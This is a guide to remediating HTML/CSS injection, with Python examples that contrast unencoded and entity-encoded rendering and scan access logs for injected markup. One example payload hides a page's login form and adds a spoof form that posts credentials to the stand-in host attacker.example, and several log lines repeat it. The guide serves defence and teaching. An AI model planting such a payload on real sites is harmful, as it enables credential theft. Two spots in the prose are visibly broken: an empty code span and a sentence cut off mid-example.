
How to remediate – HTML/CSS Injection

1. Introduction

HTML/CSS Injection is an attack in which attacker-controlled markup or style rules are inserted into a web page, altering what the victim's browser renders. This can be used to steal user credentials through fake login forms, to deface pages, or to redirect users to harmful websites. It affects web applications that place user-supplied data into a page without encoding it for the HTML context. A successful attack can compromise the confidentiality of user information (for example, credentials typed into a spoofed form) and the integrity of the content the user sees.

2. Technical Explanation

HTML/CSS Injection occurs when an application reflects unfiltered user input directly into its HTML output. An attacker provides crafted input containing HTML or CSS, which the victim's browser then parses and renders as part of the page. This requires the application to trust and display data without proper output encoding. The Common Weakness Enumeration (CWE) identifier for this class of flaw is CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'); injection into a generated web page is classified more specifically under CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). An example exploit involves submitting a URL with malicious CSS that hides a legitimate login form and displays a fake one, capturing user credentials.

  • Root cause: Lack of output encoding (and, secondarily, input validation) when user-supplied data is written into HTML pages.
  • Exploit mechanism: An attacker crafts a URL or form submission whose parameter value contains HTML/CSS; the application reflects it back to the user's browser, leading to content spoofing or potential Cross-Site Scripting (XSS). For example, submitting `` as part of a parameter.
  • Scope: Web applications in any server-side language (e.g., PHP, Python, Java) and any framework are affected when they write user input into HTML without context-aware encoding.
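The following is an added example, not code from the original page: a minimal search page that echoes a query parameter, rendered once unencoded (the injectable version) and once with HTML entity encoding (the remediated version). The page template, the attacker payload and the host name `attacker.example` are constructed for illustration. The payload is the login-form spoof described above: a `<style>` rule hides the real form and a look-alike form posts to the attacker's host.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Constructed page: a search page that reflects the "q" parameter into a <p>.
PAGE_TEMPLATE = """<html><body>
<form id="login" action="/login" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<p>Results for: {query}</p>
</body></html>"""

# Constructed attacker value for "q": CSS that hides the genuine form, followed
# by a look-alike form whose action points at a hypothetical attacker host.
PAYLOAD = (
    "<style>#login{display:none}</style>"
    '<form action="https://attacker.example/collect" method="post">'
    '<input name="user"><input name="pass" type="password"></form>'
)


def render_vulnerable(query: str) -> str:
    """Reflects the parameter as-is: this is the injectable version."""
    return PAGE_TEMPLATE.format(query=query)


def render_hardened(query: str) -> str:
    """Encodes <, >, &, " and ' so the browser shows the text instead of parsing it."""
    return PAGE_TEMPLATE.format(query=html.escape(query, quote=True))


def query_from_url(url: str) -> str:
    """Extracts the percent-decoded "q" parameter, as a server framework would."""
    return parse_qs(urlparse(url).query).get("q", [""])[0]


class TagCounter(HTMLParser):
    """Counts start tags the browser would actually see."""

    def __init__(self) -> None:
        super().__init__()
        self.counts: dict[str, int] = {}

    def handle_starttag(self, tag, attrs) -> None:
        self.counts[tag] = self.counts.get(tag, 0) + 1


def count_tags(page: str) -> dict[str, int]:
    """Returns {tag: count} for a rendered page; entity-encoded text yields no tags."""
    parser = TagCounter()
    parser.feed(page)
    return parser.counts


if __name__ == "__main__":
    url = "https://shop.example/search?q=%3Cstyle%3E%23login%7Bdisplay%3Anone%7D%3C%2Fstyle%3E"
    q = query_from_url(url)
    print("vulnerable:", count_tags(render_vulnerable(q)))
    print("hardened:  ", count_tags(render_hardened(q)))
```

Counting tags after rendering is a quick self-check for a fix: with the unencoded render the page gains a second `form` and a `style` element, with the encoded render the tag counts are identical to those of the untouched template and the payload appears on screen as literal text.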

3. Detection and Assessment

To confirm the vulnerability, first check whether user-supplied data is reflected in the HTML response without encoding. A thorough assessment then involves injecting harmless HTML/CSS markers (for example a `<b>` tag or a `<style>` rule that changes a background colour) and observing whether the rendered page changes.

  • Quick checks: Inspect the HTML source of pages where user input is displayed and look for characters that arrive unencoded, such as `<`, `>`, `&`, `"`, `'` and `/`.
  • Scanning: Burp Suite or OWASP ZAP can be used with active scanning rules to identify potential injection points. These are examples only; manual verification is required.
  • Logs and evidence: Examine web server logs for requests containing HTML/CSS tags in URL parameters, remembering that the values are usually percent-encoded (sometimes twice) and must be decoded before matching. Look for patterns like `
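As an added example of the log review described above (not code from the original page), the following script parses combined-format access log lines, percent-decodes every query parameter until it stops changing, and flags values that contain HTML or CSS constructs. The log lines are constructed for the example and use documentation addresses; the tag list in `MARKUP_RE` is an assumption about what has no business in a free-text parameter and should be tuned to the application.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed combined-format log lines (not real traffic). Line 2 carries the
# form-hiding CSS, line 3 a spoofed form, line 4 a benign "a < b" comparison.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2024:13:55:40 +0000] "GET /search?q=%3Cstyle%3E%23login%7Bdisplay%3Anone%7D%3C%2Fstyle%3E HTTP/1.1" 200 734 "-" "curl/8.0"
203.0.113.9 - - [10/May/2024:13:56:01 +0000] "GET /profile?name=%3Cform+action%3Dhttps%3A%2F%2Fattacker.example%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:13:56:12 +0000] "GET /search?q=a%20%3C%20b HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Enough of the combined log format to recover client, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed indicators: opening/closing tags that can restyle or spoof a page,
# inline style attributes, and CSS functions used to load remote resources.
MARKUP_RE = re.compile(
    r'<\s*/?\s*(style|form|iframe|img|a|div|script|link|meta)\b'
    r'|style\s*=|expression\s*\(|url\s*\(',
    re.IGNORECASE,
)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decodes repeatedly so double-encoded payloads do not slip past."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_markup_in_logs(log_text: str) -> list:
    """Returns (client_ip, path, parameter, decoded_value) for each suspicious value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        target = m["target"]
        params = parse_qs(urlparse(target).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                decoded = decode_fully(value)
                if MARKUP_RE.search(decoded):
                    hits.append((m["ip"], target.split("?", 1)[0], name, decoded))
    return hits


if __name__ == "__main__":
    for ip, path, param, value in find_markup_in_logs(SAMPLE_LOG):
        print(f"{ip} {path} {param}={value!r}")
```

Matching on the decoded value rather than on the raw request line is what makes this usable: `%3Cstyle%3E` never contains a literal `<`, and a bare `<` in a comparison such as `a < b` is not on its own evidence of injection, so the pattern requires a tag name after the bracket.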